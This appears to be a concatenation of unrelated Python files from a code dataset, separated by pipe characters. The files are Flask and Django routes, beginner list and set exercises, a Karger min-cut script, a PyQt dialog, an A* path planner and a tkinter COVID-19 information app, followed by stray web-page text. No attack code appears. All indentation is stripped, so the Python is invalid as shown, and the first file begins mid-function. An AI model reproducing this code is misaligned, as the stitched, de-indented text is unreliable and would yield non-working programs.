return ("Python %s" % escape(text.replace("_", " ")))
@app.route('/number/<int:number>')
def is_it_a_number(number, strict_slashes=False):
""" rules for number variables routing"""
return ("%d is a number" % number)
@app.route('/number_template/<int:number>')
def number_template(number, strict_slashes=False):
""" displays an html template on a valid number"""
return render_template('5-number.html', number=number)
@app.route('/number_odd_or_even/<int:number>')
def odd_or_even(number, strict_slashes=False):
""" displays even or odd depending on the number given """
return render_template(
'6-number_odd_or_even.html',
number=number,
evenodd=("even" if number % 2 == 0 else "odd"))
if __name__ == '__main__':
app.run(host='0.0.0.0')
|
# lst=[-2,-1,0,1,2,3,4]#find least +ve missing in
#
#
# # print(1 in lst)#chk for 1 is in list or not
#
# cnt=1
# for i in range(0,len(lst)):
# if cnt in lst:#1 in lst 2 in lst 3 4 5
# cnt+=1#cnt=2,3
# else:
# print(cnt ,"is missing least +ve missing integer")
# break
#
# st={1,2,3,3,4}
# lst=list(st)
# print(lst[3])
lst=[-1,-2,0,1,2,3,4]
cnt=1
for num in lst:#num=-1,-2,0,1,2
if(num>0):
if(num==cnt):#1==1
print("hello")
cnt=cnt+1#cnt=2,35
print(cnt)
else:
print(cnt,"is missing integer")
break
|
from django.shortcuts import render, redirect, get_object_or_404
from django.http import HttpResponse, JsonResponse
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.auth.decorators import login_required
from django.contrib.auth.decorators import permission_required
from django.contrib.auth.mixins import PermissionRequiredMixin
# CRUD
from django.views.generic import ListView
from django.views.decorators.csrf import csrf_exempt
from django.urls import reverse_lazy, reverse
# search
from django.db.models import Q
from django.db import IntegrityError
from django.core.exceptions import ObjectDoesNotExist
from app.models import Medication
import json
# LoginRequiredMixin, PermissionRequiredMixin,
# class MedicationList(ListView):
# """ the process profile list page (operation). """
# login_url = '/login/'
# model = Medication
# template_name = 'app/medication/medication_list.html'
# paginate_by = 10
# # permission_required = 'oven.view_process_profile'
#
# def get_context_data(self, *args, **kwargs):
# context = super().get_context_data(*args, **kwargs)
# context['medication'] = Medication.objects.all()
# return context
#
# def get_queryset(self):
# return Medication.objects.all()
def Dashboard(request):
template = 'app/dashboard/dashboard.html'
context = {}
return render(request, template, context)
|
farm_animals = {"sheep", "cow", "hen"}
print(farm_animals)
for animal in farm_animals:
print(animal)
print("="*40)
wild_animals = set(["lion", "tiger", "panther"])
print(wild_animals)
for animal in wild_animals:
print(animal)
print("="*40)
farm_animals.add("horse")
wild_animals.add("elephant")
print()
print(farm_animals)
print(wild_animals)
empty_set = set()
empty_set_2 = {} # type:ignore
empty_set.add("a")
# empty_set_2.add ("b") Cannot be used in dictionaries
even = set(range(0, 40, 2))
print("Even: ", even)
odd_tuples = (1, 3, 5, 7, 9)
odd = set(odd_tuples)
print("Odd: ", odd)
squares = set([4, 9, 16, 25])
print("Squares: ", squares)
print(even.union(odd))
print("Union:", even.union(squares))
print(f"""Even: {len(even)}
Squares: {len(squares)}
Union: {len(even.union(squares))}""")
print("Difference: ", even.difference(squares))
print("Same: ", even.intersection(squares))
# Functions above return result
# Functions below enforce result on variable
even.intersection_update(squares)
print("Even after intersection: ", even)
print()
print(squares.symmetric_difference(even))
print(even.symmetric_difference(squares))
print()
print(squares.difference(even))
print(even.difference(squares))
squares.remove(4)
squares.discard(25)
squares.discard(8) # Does not give error
# squares.remove(8) Gives error
print("Squares: ", squares)
even = set(range(0, 40, 2))
print(even)
squares_tuple = (4, 6, 16)
squares = set(squares_tuple)
print(squares)
if squares.issubset(even):
print("Squares is subset of even")
if squares.issuperset(even):
print("Squares is superset of even")
frozen_even = frozenset(range(0, 100, 2)) # Cannot be changed
print(frozen_even)
# frozen_even.add(3) Impossible
|
"""a = 2
arr = [1, 2, 3]
cnt = 0
for i in arr:
if a > i:
cnt +=1
arr.insert(cnt, a)
print(arr)
"""
n = int(input())
arr_1 = list(map(int, input().split()))
m = int(input())
arr_2 = list(map(int, input().split()))
for num in arr_1:
cnt = 0
for i in arr_2:
if num > i:
cnt += 1
arr_2.insert(cnt, num)
for i in arr_2:
print(i, end = " ") |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Oct 6 20:17:09 2018
@author: tyler
"""
import numpy as np
import sys
#%%
def karger(G,vertex_label,vertex_degree,size_V):
size_V = len(vertex_label)
#N = int(size_V*(1-1/np.sqrt(2)))
iteration_schedule = [size_V-2]
for N in iteration_schedule:
for n in range(N):
# if n%1000==0: print('iteration:',n)
# uniformly at random pick e = (v0,v1)
cs0 = np.cumsum(vertex_degree)
rand_idx0 = np.random.randint(cs0[-1])
e0 = np.searchsorted(cs0,rand_idx0,side='right')
#cs1 = np.cumsum(np.append(G[e0,e0:],G[:e0,e0]))
cs1 = np.cumsum(G[e0])
rand_idx1 = np.random.randint(vertex_degree[e0])
e1 = np.searchsorted(cs1,rand_idx1,side='right')
if(G[e0,e1] == 0):
print('picked empty edge')
v0 = e0
v1 = e1
# bring edges from v1 into v0
# add new edges to v0
G[v0] += G[v1]
G[:,v0] += G[v1]
new_edge_count = vertex_degree[v1] - G[v0,v0] #- G[v1,v1]
# delete old edges from v1
G[v1] = 0
G[:,v1] = 0
# delete any created loops
G[v0,v0] = 0
np.putmask(vertex_label,vertex_label==v1,v0)
vertex_degree[v0] += new_edge_count
vertex_degree[v1] = 0
nz = np.nonzero(vertex_degree)[0]
if(len(nz) != 2):
print('did not find well defined cut')
SN0 = np.where(vertex_label == nz[0])[0]
SN1 = np.where(vertex_label == nz[1])[0]
if len(SN0) + len(SN1) != size_V:
print('lost nodes')
if len(SN0) < len(SN1):
cut = SN0
else:
cut = SN1
return cut,vertex_degree[nz[0]]
#%%
#python p1.py z N ID
z = sys.argv[1] # 0,1,2,3
N = int(sys.argv[2]) # integer number of runs
ID = sys.argv[3] # output file id
#%%
E_raw = np.loadtxt('b'+str(z)+'.in',dtype='int')
min_E = np.min(E_raw)
E = E_raw - min_E
size_V = np.max(E)+1
G = np.zeros((size_V,size_V),dtype='int64')
vertex_degree = np.zeros(size_V,dtype='int64')
for e0,e1 in E:
vertex_degree[e0] += 1;
vertex_degree[e1] += 1;
G[min(e0,e1),max(e0,e1)] += 1;
G[max(e0,e1),min(e0,e1)] += 1;
vertex_label = np.arange(size_V,dtype='int64') # gives index of supervertex containg vertex
#%%
f=open('b'+z+'/cuts_'+ID+'.dat','ab')
g=open('b'+z+'/cut_sizes_'+ID+'.dat','ab')
#
for n in range(N):
if n%500 == 0:
print(ID+'_trial :', n,' of ',N)
vl,cut_size = karger(np.copy(G),np.copy(vertex_label),np.copy(vertex_degree),size_V)
np.savetxt(f,[vl],fmt='%d',delimiter=',')
np.savetxt(g,[cut_size],fmt='%d',delimiter=',')
f.close()
g.close()
|
from app.app import app
from Users.model import checkJWT
from Topics.model import Topics
@app.route('/topics',methods = ['GET'])
@checkJWT
def getTopics(userId):
return Topics().getTopics() |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'cat_men.ui'
#
# Created by: PyQt5 UI code generator 5.15.0
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Catm(object):
def setupUi(self, Categories):
Categories.setObjectName("Categories")
Categories.resize(605, 381)
self.clistWidget = QtWidgets.QListWidget(Categories)
self.clistWidget.setGeometry(QtCore.QRect(10, 20, 431, 291))
self.clistWidget.setObjectName("clistWidget")
self.copushButton = QtWidgets.QPushButton(Categories)
self.copushButton.setGeometry(QtCore.QRect(10, 330, 131, 41))
font = QtGui.QFont()
font.setPointSize(11)
self.copushButton.setFont(font)
self.copushButton.setObjectName("copushButton")
self.cnpushButton = QtWidgets.QPushButton(Categories)
self.cnpushButton.setGeometry(QtCore.QRect(160, 330, 131, 41))
font = QtGui.QFont()
font.setPointSize(11)
self.cnpushButton.setFont(font)
self.cnpushButton.setObjectName("cnpushButton")
self.cdpushButton = QtWidgets.QPushButton(Categories)
self.cdpushButton.setGeometry(QtCore.QRect(310, 330, 131, 41))
font = QtGui.QFont()
font.setPointSize(11)
self.cdpushButton.setFont(font)
self.cdpushButton.setObjectName("cdpushButton")
self.cmpushButton = QtWidgets.QPushButton(Categories)
self.cmpushButton.setGeometry(QtCore.QRect(460, 20, 131, 41))
font = QtGui.QFont()
font.setPointSize(11)
self.cmpushButton.setFont(font)
self.cmpushButton.setObjectName("cmpushButton")
self.cepushButton = QtWidgets.QPushButton(Categories)
self.cepushButton.setGeometry(QtCore.QRect(460, 90, 131, 41))
font = QtGui.QFont()
font.setPointSize(11)
self.cepushButton.setFont(font)
self.cepushButton.setObjectName("cepushButton")
self.retranslateUi(Categories)
QtCore.QMetaObject.connectSlotsByName(Categories)
def retranslateUi(self, Categories):
_translate = QtCore.QCoreApplication.translate
Categories.setWindowTitle(_translate("Categories", "Dialog"))
self.copushButton.setText(_translate("Categories", "Open"))
self.cnpushButton.setText(_translate("Categories", "New"))
self.cdpushButton.setText(_translate("Categories", "Delete"))
self.cmpushButton.setText(_translate("Categories", "Main Menu"))
self.cepushButton.setText(_translate("Categories", "Edit"))
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Apr 9 19:49:58 2021
@author: jayesh
"""
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Apr 12 08:20:17 2021
@author: jayesh
@teammate: Yoseph Kebede
"""
import numpy as np
import copy
import math
import time
import ast
import cv2
import pygame
import os
from queue import PriorityQueue
#from act_proj3 import actionSet
import matplotlib.pyplot as plt
from matplotlib.patches import Rectangle
#Start and Goal Nodes
s = [] #List storing user input start node
act=[]
g = [] #List storing user input goal node
n_list=[]
s_list=[]
#Obstacle variables
oblist1=[] #List to store the obstacle coordinates for final andimation
riglist=set([]) #List to store obstacle with clearance
#Enironment variables
xmax=1000 #Width of the map
ymax=1000 #Height of the map
#Child expansion variables
threshold=0.5 #Minimum difference between expanded nodes
visited=[] #List storing visited nodes
visited_nodes = np.zeros((2002,2002,25)) #Matrix storing visited nodes approximated with respect to threshold
#act=actionSet() #Instance of the actionSet class used to perform the child expansion actions
#Cost storing variables
cost2come = np.full((2002,2002,25),np.inf) #Matrix storing cost from start to expanded nodes initialized to infinity
cost2goal = np.full((2002,2002,25),np.inf) #Matrix storing cost from expanded nodes to goal initialized to infinity
totCost = np.full((2002,2002,25),np.inf) #Matrix storing sum of cost to come and cost to goal initialized to infinity
#Backtracking variables
path_track={} #Dictionary storing child nodes to a parent key
path_track1={} #Dictionary storing child nodes to a parent key
#Visualization variables
im_count=0
act_track={}
pygame.init() #Initializing Pygame
display_width = 1000 #Frame width
display_height = 1000 #Frame height
gameDisplay = pygame.display.set_mode((display_width,display_height),pygame.SCALED)
pygame.display.set_caption('A* Animation')
black = (0,0,0) #Color represnting the background of image
white = (0,255,255) #Color respresenting the visited nodes
yellow=(255,255,0) #Color representing the obstacles
#Temporary Queue variables
q = PriorityQueue() #Setting a priority queue
def Action(curr_node,ul,ur):
a_list=[]
b_list=[]
x = curr_node[0]
y = curr_node[1]
ang=curr_node[2]
#print('before act',x,y,ang)
t = 0
r = 3.8
l = 35.4
#print('rpms',ul,ur)
dt=0.1
cost=0
xs=x
ys=y
while t < 1:
t = t + dt
if obstaclecheck(x, y)!=True and x<=xmax and y<=ymax and x>=0 and y>=0:
xs=x
ys=y
dx = 0.5*r * (ul + ur) * math.cos(ang*math.pi/180) * dt
dy = 0.5*r * (ul + ur) * math.sin(ang*math.pi/180) * dt
dtheta = (r / l) * (ur - ul) * dt
dtheta=dtheta*180/math.pi
ang+= dtheta
cost=cost+ math.sqrt(math.pow((0.5*r * (ul + ur) * math.cos(ang*math.pi/180) * dt),2)+math.pow((0.5*r * (ul + ur) * math.sin(ang*math.pi/180) * dt),2))
x+= dx
y+= dy
if obstaclecheck(x, y)!=True and obstaclecheck(xs, ys)!=True and x<=xmax and y<=ymax and x>=0 and y>=0 and xs>0 and ys > 0 and xs<xmax and ys<ymax:
plt.plot([xs, x], [ys, y], color="red")
n_list.append([x,y])
s_list.append([xs,ys])
a_list.append([xs,ys])
b_list.append([x,y])
pygame.event.get()
pygame.display.flip()
pygame.draw.rect(gameDisplay, white, [xs,1000-ys,1,1])
pygame.draw.rect(gameDisplay, white, [x,1000-y,1,1])
else:
break
if ang >= 360 or ang<0:
ang=ang%360
new_node = [x,y,int(ang)]
return new_node,cost,a_list,b_list
#Function run initially to set the obstacle coordinates in the image and append to a list
def getobstaclespace():
oblist1=[] #List to store the obstacle coordinates for final animation
riglist=set([])
radius=10
clearance=5
dist= radius + clearance
for x in range(0,1001):
for y in range(0,1001):
if (x-200)**2 + (y-200)**2 <= 100**2:
oblist1.append([x,y])
if (x-200)**2 + (y-800)**2 <= 100**2:
oblist1.append([x,y])
# left square
if 25 <= x <= 175:
if 425 <= y <= 575:
oblist1.append((x, y))
# right square
if 375 <= x <= 625:
if 425 <= y <= 575:
oblist1.append((x, y))
# top left square
if 725 <= x <= 875:
if 200 <= y <= 400:
oblist1.append((x, y))
if (x-200)**2 + (y-200)**2 <= (100+dist)**2:
riglist.add(str([x,y]))
if (x-200)**2 + (y-800)**2 <= (100+dist)**2:
riglist.add(str([x,y]))
# left square
if (75-dist) <= x <= (175+dist):
if (425-dist) <= y <= (575+dist):
riglist.add(str([x,y]))
# right square
if (375-dist) <= x <= (625+dist):
if (425-dist) <= y <= (575+dist):
riglist.add(str([x,y]))
# top left square
if (725-dist) <= x <= (875+dist):
if (200-dist) <= y <= (400+dist):
riglist.add(str([x,y]))
return oblist1,riglist
def obstaclecheck(x,y):
radius=10
clearance=5
dist= radius + clearance
if (x-200)**2 + (y-200)**2 <= (100+dist)**2:
return True
if (x-200)**2 + (y-800)**2 <= (100+dist)**2:
return True
if (25-dist) <= x <= (175+dist):
if (425-dist) <= y <= (575+dist):
return True
if (375-dist) <= x <= (625+dist):
if (425-dist) <= y <= (575+dist):
return True
if (725-dist) <= x <= (875+dist):
if (200-dist) <= y <= (400+dist):
return True
if y>=(ymax-dist) and y<=(ymax):
return True
if x>=(xmax-dist) and x<=(xmax):
return True
if x>=0 and x<=dist:
return True
if y>=0 and y<=dist:
return True
#Nodes cost calculation
def c2gCalc(start,goal):
#euclidean distance of goal
dist=math.sqrt((start[0]-goal[0]) ** 2 + (start[1]-goal[1])**2)
return dist
#Confirming expanded node has reached goal space
def goalReachCheck(start,goal):
print('checking goal')
goal_thresh= 100
if ((start[0]-goal[0]) ** 2 + (start[1]-goal[1])**2) <= (goal_thresh**2):
return True
else:
return False
def round_15(child_ang):
new_ang = int((round(child_ang/15)*15)//15)
if new_ang==24:
new_ang=0
return new_ang
#Creating / Updating total cost of expanded nodes
def cost_update(child,par,cost,stepprev,stepaft):
child_ang=int((round(child[2]/15)*15)//15)
par_ang=int((round(par[1][2]/15)*15)//15)
x= child[0]; y = child[1]; z=int(child_ang)
a = par[1][0]; b = par[1][1]; c = int(par_ang)
x1=int(round(x/2)*2)
y1=int(round(y/2)*2)
a1=int(round(a/2)*2)
b1=int(round(b/2)*2)
i=0
while i<len(stepprev):
if str(stepprev[i]) in path_track1:
path_track1[str(stepprev[i])].append(stepaft[i])
else:
path_track1[str(stepprev[i])]=[]
path_track1[str(stepprev[i])].append(stepaft[i])
i+=1
if ((obstaclecheck(x,y)!=True) and (x>0 and x<xmax) and (y>0 and y<ymax) and (child is not None)):
if visited_nodes[2*x1][2*y1][z]==1:
cost2come[2*x1][2*y1][z]= cost + cost2come[2*a1][2*b1][c]
totCost1 = cost2come[2*x1][2*y1][z] + cost2goal[2*x1][2*y1][z]
if totCost1 < totCost[2*x1][2*y1][z]:
totCost[2*x1][2*y1][z] = totCost1
if str([a,b]) in path_track:
path_track[str([a,b])].append([x,y])
else:
path_track[str([a,b])]=[]
path_track[str([a,b])].append([x,y])
else:
visited_nodes[2*x1][2*y1][z]=1
cost2come[2*x1][2*y1][z]=cost+cost2come[2*a1][2*b1][c] #Calculating the new cost
cost2goal[2*x1][2*y1][z]=c2gCalc([x1,y1],[g[0],g[1]])
totCost[2*x1][2*y1][z]=cost2come[2*x1][2*y1][z]+cost2goal[2*x1][2*y1][z]
q.put([totCost[2*x1][2*y1][z], [x,y,child[2]]]) #Updating the priority queue
child=[x,y,z]
if str([a,b]) in path_track:
path_track[str([a,b])].append([x,y])
else:
path_track[str([a,b])]=[]
path_track[str([a,b])].append([x,y])
def act_update(step1,step2,rpm1,rpm2):
i=0
while i<len(step1):
act_track[str(step2[i])]=[]
act_track[str(step2[i])].append([rpm1,rpm2])
i+=1
def main(rpm1,rpm2):
l=0
while not q.empty(): #and l!=1: #Process when queue is not empty
a=q.get() #Varibale to store the cost and node position
x_n= a[1][0]; y_n = a[1][1]; z_n=(round(a[1][2]/15)*15)//15
x_g= g[0]; y_g = g[1]; z_g = int(round(g[2]/15)*15)//15 #g[2]=30 for this project
#Checking if goal is reached or not
if goalReachCheck([x_n,y_n],[x_g, y_g]):
print('goal',x_n,y_n,g)
i=[x_g,y_g]
visited.append([x_g,y_g])
path_track[str([x_n,y_n])]=[]
path_track[str([x_n,y_n])].append(i)
path_track1[str([x_n,y_n])]=[]
path_track1[str([x_n,y_n])].append(i)
print('goal reached')
break
l+=1
print(l)
child1,cost1,step_list1,step_list2 = Action(a[1],0,rpm1)
cost_update(child1, a, cost1,step_list1,step_list2)
act_update(step_list1,step_list2,0,rpm1)
child2,cost2,step_list1,step_list2 = Action(a[1],rpm1,0)
cost_update(child2, a, cost2,step_list1,step_list2)
act_update(step_list1,step_list2,rpm1,0)
child3,cost3,step_list1,step_list2= Action(a[1],rpm1,rpm1)
cost_update(child3, a, cost3,step_list1,step_list2)
act_update(step_list1,step_list2,0,rpm1)
child4,cost4,step_list1,step_list2= Action(a[1],0,rpm2)
cost_update(child4, a, cost4,step_list1,step_list2)
act_update(step_list1,step_list2,0,rpm2)
child5,cost5,step_list1,step_list2 = Action(a[1],rpm2,0)
cost_update(child5, a, cost5,step_list1,step_list2)
act_update(step_list1,step_list2,rpm2,0)
child6,cost6,step_list1,step_list2= Action(a[1],rpm2,rpm2)
cost_update(child6, a, cost6,step_list1,step_list2)
act_update(step_list1,step_list2,rpm2,rpm2)
child7,cost7,step_list1,step_list2 = Action(a[1],rpm1,rpm2)
cost_update(child7, a, cost7,step_list1,step_list2)
act_update(step_list1,step_list2,rpm1,rpm2)
child8,cost8,step_list1,step_list2 = Action(a[1],rpm2,rpm1)
cost_update(child8, a, cost8,step_list1,step_list2)
act_update(step_list1,step_list2,rpm2,rpm1)
def plot_ob(path):
fig, ax = plt.subplots()
ax.set(xlim=(0, 1000), ylim=(0, 1000))
c1 = plt.Circle((200, 200), 100, edgecolor = 'k', facecolor = "orange")
c2 = plt.Circle((200, 800), 100, edgecolor = 'k', facecolor = "orange")
currentAxis = plt.gca()
currentAxis.add_patch(Rectangle((25, 425), 150, 150, edgecolor = 'k', facecolor = "orange"))
currentAxis.add_patch(Rectangle((375, 425), 250, 150, edgecolor = 'k', facecolor = "orange"))
currentAxis.add_patch(Rectangle((725, 200), 150, 200, edgecolor = 'k', facecolor = "orange"))
ax.add_artist(c1)
ax.add_artist(c2)
ax.set_aspect('equal')
plt.grid()
plt.plot(g[0], g[1], color='green', marker='o', linestyle='dashed', linewidth=30,
markersize=30)
plt.plot(s[0], s[1], color='yellow', marker='o', linestyle='dashed', linewidth=30,
markersize=30)
path = path[::-1]
x_path = [path[i][0] for i in range(len(path))]
y_path = [path[i][1] for i in range(len(path))]
plt.plot(x_path, y_path, "-r",linewidth=3.4)
l=0
while l<len(s_list):
plt.plot([s_list[l][0], n_list[l][0]], [s_list[l][1], n_list[l][1]],linewidth=1, color="blue")
l=l+1
def backtracking (start, goal): #Backtracking to find the paths traversed from the initial state to the final state
val = goal
path_track_list=[]
path_track_list.append(val)
try:
if str('[152, 1]') in path_track1.keys():
print('found')
else:
print('key no')
if '[208, 2]' in path_track1.values():
print('val found')
else:
print('not found')
#print(path_track1.keys())
while val!=start:
for key, values in path_track1.items():
while val in values:
key= ast.literal_eval(key) #converting strings of lists to pure lists
val = key
path_track_list.append(val)
path_track_list1 = path_track_list[::-1]
for path in path_track_list1:
for key in act_track.keys():
if str(path)==key:
act.append(act_track.get(key))
print('Action set',act_track)
print('final act list',act)
except KeyError:
print('value not found')
plot_ob(path_track_list)
return path_track_list
def visualization(): #Creating an animation using pygame
pygame.event.get()
gameDisplay.fill(black)
#Setting the obstacle space in the animation
for path in oblist1:
x = int(path[0])
y = abs(1000-int(path[1]))
#pygame.display.flip()
pygame.draw.rect(gameDisplay, yellow, [x,y,1,1])
#pygame.time.wait(0)
##################################################### Code execution starts here #######################################################
if __name__ == "__main__":
oblist1, riglist=getobstaclespace() #Retrieve obstacle and clearance information
visualization()
#act.plot_ob()
while True:
# x1=20 #int(input('Enter x coordinate of start node: '))
# y1=20 #int(input('Enter y coordinate of start node: '))
# theta=30 #int(input('Enter degree of start node: ')) #theta for this project is 30
x1=600
y1=800
theta=30
s = [x1,y1,theta] #Start Position
rpm1=int(input('Enter rpm of left wheel: '))
rpm2=int(input('Enter rpm of right wheel: '))
x2=int(input('Enter x coordinate of goal node: '))
y2=int(input('Enter y coordinate of goal node: '))
g = [x2,y2,30] #Goal Position
start= [x1, y1]
goal = [x2, y2]
act_track[str(start)]=[]
act_track[str(start)].append([0,0])
if goalReachCheck(start,goal): #Checking if goal node is the same as the start node
print('start node equal to/within threshold of goal node. Re enter your points again')
continue
elif obstaclecheck(x1,y1)==True: #Checking if start node is in the obstaclespace plus clearance
print('Start node in obstacle space. Re enter the points again')
continue
elif obstaclecheck(x2,y2)==True: #Checking if goal node is in the obstaclespace plus clearance
print('Goal node in obstacle space. Re enter the points again')
continue
elif (x1 <0 or x1> xmax) or (y1<0 or y1 > ymax): #Checking if start node is within the grid(400x300)
print('start node is outside environment. Re enter the points again')
continue
elif (x2 <0 or x2> xmax) or (y2<0 or y2 > ymax): #Checking if goal node is within the grid(400X300)
print('Goal node is outside Environment. Re enter the points again')
continue
else:
break
print(s)
print(g)
visited.append(start)
z=int(round(s[2]/15)*15)//15
visited_nodes[2*x1][2*y1][z]=1
#Initializing the cost to come of start point to zero
cost2come[2*x1][2*y1][z] = 0
#Initializing the cost2goal for start node
cost2goal[2*x1][2*y1][z] = c2gCalc(start,goal)
#Updating the total heurisitc for start node
totCost[2*x1][2*y1][z] = cost2come[2*x1][2*y1][z] + cost2goal[2*x1][2*y1][z]
#print(totCost[2*x1][2*y1][z])
#Initializing the queue with a Total cost and the start node
q.put([totCost[2*x1][2*y1][z], s])
start_time = time.time() #Program start time
main(rpm1,rpm2) #Executing search
#Time to reach goal state
print('time to reach goal',time.time()-start_time)
#Converting start and goal node with threshold of 0.5 units
s=[x1,y1]
g=[x2,y2]
print(g)
#print('path track',path_track)
#Performing backtracking to obtain list for optimal path
path_track_list = backtracking(s, g)
path1=[]
#print(path)
#print('path track',path_track_list)
for path in path_track_list:
pygame.event.get()
x = path[0]
y = abs(1000-path[1])
path1.append((x,y))
pygame.display.flip()
#print('displaying')
#print(x,y)
pygame.draw.rect(gameDisplay, (255,5,5), [x,y,5,5])
#pygame.image.save(gameDisplay, f"/home/jayesh/Documents/ENPM661_PROJECT1/map1/{im_count}.png") #Saving the images to create a video #uncomment if not required
#im_count+=1
pygame.time.wait(20)
plt.show()
#Terminate Pygame
pygame.quit()
#Print the total time taken to reach goal state and backtrack
print("total time:")
print(time.time()-start_time)
############################################# Code Execution ends here #############################################################
|
import requests
import tkinter as tk
import webbrowser as wb
class Application(tk.Frame):
def __init__(self, master=None):
super().__init__(master)
self.master = master
self.pack()
self.create_widgets()
def create_widgets(self):
self.vaccine = tk.Button(self, text="Find a COVID-19 Vaccination Center Near Me", command=self.vaccination)
self.vaccine.pack(side="top")
self.tests = tk.Button(self, text="Find a COVID-19 Assessment Center Near Me", command=self.testing)
self.tests.pack(side="top")
self.cases = tk.Button(self, text="Updated COVID-19 Case Counts", command=self.casecounts)
self.cases.pack(side="top")
self.rollout = tk.Button(self, text="Information on Canada's Vaccine Rollout", command=self.vacroll)
self.rollout.pack(side="top")
self.discord = tk.Button(self, text="Join the Vaccine Hunters Canada Discord Server!", command=self.vachunt)
self.discord.pack(side="top")
self.quit = tk.Button(self, text="Close the Program", fg="red",
command=self.master.destroy)
self.quit.pack(side="bottom")
def vaccination(self):
wb.open("https://www.google.ca/maps/search/covid+vaccine+near+me")
def testing(self):
wb.open("https://www.google.ca/maps/search/covid+assessment+sites+near+me")
def casecounts(self):
window = tk.Toplevel(self.master)
window.title("COVID-19 Case Counts - Canada")
requestAPI = requests.get("https://api.covid19tracker.ca/summary")
api = requestAPI.json()["data"]
tk.Label(master=window, text="As of " + api[0]["latest_date"] + " in Canada, there are: \n" + api[0]["change_cases"] + " new cases\n"
+ api[0]["change_fatalities"] + " new deaths\n"
+ api[0]["change_recoveries"] + " new recoveries").pack()
tk.Button(master=window, text="Click here to see a visualization of cases in Canada", command=self.casecountvisual).pack()
def casecountvisual(self):
wb.open("https://www.google.com/search?q=covid+19+cases")
def vacroll(self):
wb.open("https://www.canada.ca/en/public-health/services/diseases/coronavirus-disease-covid-19/vaccines/how-vaccinated.html")
def vachunt(self):
wb.open("https://discord.gg/nKAE9Cta")
root = tk.Tk()
topFrame = tk.Frame()
tk.Label(text="Welcome to the COVID-19 Information Center \nHere, you'll find resources to help the world fight against the COVID-19 pandemic!").pack(side="top")
app = Application(master=root)
app.master.title("COVID-19 Information Center")
app.mainloop() |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.